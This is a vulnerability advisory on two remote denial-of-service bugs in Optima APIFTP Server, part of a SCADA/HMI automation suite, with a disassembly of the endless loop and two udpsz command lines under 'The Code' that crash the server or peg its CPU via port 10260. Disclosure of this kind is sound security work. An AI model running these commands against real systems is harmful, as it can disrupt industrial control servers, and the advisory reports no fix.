optima apiftp server - Multiple Vulnerabilities

Related Vulnerabilities: CVE-2012-5049   CVE-2012-5048  
Publish Date: 14 Nov 2011


                             Luigi Auriemma

Application:  Optima APIFTP Server
Versions:     <=
Platforms:    Windows
Bugs:         A] NULL pointer
              B] endless loop
Exploitation: remote
Date:         13 Nov 2011
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


1) Introduction
2) Bugs
3) The Code
4) Fix


1) Introduction

Optima is a suite of automation software for controlling PLC via
SCADA/HMI interface.
APIFTP Server is a file server for working with remote files located on
shared folders.


2) Bugs

A] NULL pointer

NULL pointer exploitable through too long path names.
The effect is the displaying of a MessageBox with the error and the
continuing of the execution that will lead to a stack exaustion after
some seconds and the termination of the server.

B] endless loop

Endless loop with CPU at 100% caused by incomplete packets:

  004A9C93   8B03             /MOV EAX,DWORD PTR DS:[EBX]
  004A9C95   8B80 78010000    |MOV EAX,DWORD PTR DS:[EAX+178]
  004A9C9B   2D B80B0000      |SUB EAX,0BB8     ; Switch (cases BB8..BE0)
  004A9CA0   74 19            |JE SHORT APIFTPSe.004A9CBB
  004A9CA2   83E8 14          |SUB EAX,14
  004A9CA5   74 47            |JE SHORT APIFTPSe.004A9CEE
  004A9CA7   83E8 0A          |SUB EAX,0A
  004A9CAA   0F84 9D000000    |JE APIFTPSe.004A9D4D
  004A9CB0   83E8 0A          |SUB EAX,0A
  004A9CB3   0F84 CA000000    |JE APIFTPSe.004A9D83
  004A9CB9  ^EB D8            |JMP SHORT APIFTPSe.004A9C93


3) The Code


  udpsz -C "e803 0400 ff" -T -D -3 -d SERVER 10260 0x107

  wait some seconds, the tool will quit automatically

  udpsz -C "e803 0400 00" -T -D SERVER 10260 -1


4) Fix

No fix.
